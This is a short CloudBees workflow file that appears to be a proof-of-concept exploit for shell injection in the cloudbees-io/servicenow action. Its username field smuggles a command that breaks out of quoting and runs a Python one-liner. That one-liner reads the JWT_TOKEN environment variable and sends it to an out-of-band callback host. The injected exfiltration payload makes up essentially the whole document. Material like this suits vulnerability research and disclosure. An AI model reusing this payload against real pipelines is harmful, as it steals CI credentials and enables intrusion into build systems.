apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: servicenow-shell-injection-poc
on:
  workflow_dispatch:
jobs:
  exploit:
    steps:
      - uses: cloudbees-io/servicenow@v1
        with:
          action-type: 'create_change'
          url: 'https://example.service-now.com'
          username: "x' & python3 -c \"import urllib.request; urllib.request.urlopen('https://d92m7ikjor34qm6itqugomnxjizzyujbs.oast.online/?jwt=' + __import__('os').environ['JWT_TOKEN'])\"; :'y"
          password: 'testpass'
          cr-number: '12345'
